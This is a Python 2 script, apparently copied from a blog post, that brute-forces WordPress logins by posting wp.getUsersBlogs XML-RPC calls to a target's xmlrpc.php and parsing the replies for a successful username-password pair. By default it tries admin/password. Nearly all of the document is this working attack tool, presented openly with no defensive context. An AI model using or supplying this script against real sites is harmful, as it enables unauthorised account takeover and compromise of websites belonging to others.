#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys
import httplib
from urllib2 import urlopen, HTTPError, URLError
from xml.dom.minidom import parseString
from xml.parsers.expat import ExpatError
def brute(host, port, username, password):
"""WordPress xmlrpc.php brute force attacks """
payload = """<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>%s</value></param>
<param><value>%s</value></param>
</params>
</methodCall>""" % (username, password)
# xmlrpc.php location
url = "http://%s:%s/xmlrpc.php" % (host, port)
# post payload data
try:
httpobj = urlopen(url, data=payload, timeout=10)
except HTTPError:
print "[-] 404 not found."
return False
except URLError:
print "[-] host is down."
return False
except httplib.BadStatusLine: # www.metasploit.com
return False
except httplib.IncompleteRead: # hao123.com
return False
else:
# status code != 200, ex: 302
if 200 != httpobj.getcode():
print "[-] Wordpress xmlrpc.php does not exist."
return False
# status code == 200
# xmlrpc.php exists
response = httpobj.read()
try:
dom = parseString(response)
# failed to parse xml data
except ExpatError:
print "[-] Wordpress xmlrpc.php does not exist."
else:
# the first member tag is for failed or success.
# 403 for failed, 0 for success
members = dom.getElementsByTagName('member')
auth_check = members[0]
# name = auth_check.getElementsByTagName('name')[0].toxml()
# name = name.replace('<name>', '').replace('</name>')
# bol - 0
booleans = auth_check.getElementsByTagName('boolean')
if len(booleans) < 1:
print "[-] failed : [ %s:%s ]" % (username, password)
else:
# boolean is for successful login.
bret = booleans[0].toxml()
bret = bret.replace('<boolean>', '').replace('</boolean>', '')
if 0 == int(bret):
print "[+] success: [ %s:%s ] " % (username, password)
return True
elif 1 == int(bret):
print "[+] success: [ %s:%s ] - A" % (username, password)
return True
else:
print "[-] failed : [ %s:%s ]" % (username, password)
return False
return False
if __name__ == "__main__":
if len(sys.argv) == 2:
brute(sys.argv[1], '80', 'admin', 'password')
else:
print "brute.py www.example.com (default port: 80)"
xmlrpc.php brute attack
最新推荐文章于 2024-07-18 11:12:39 发布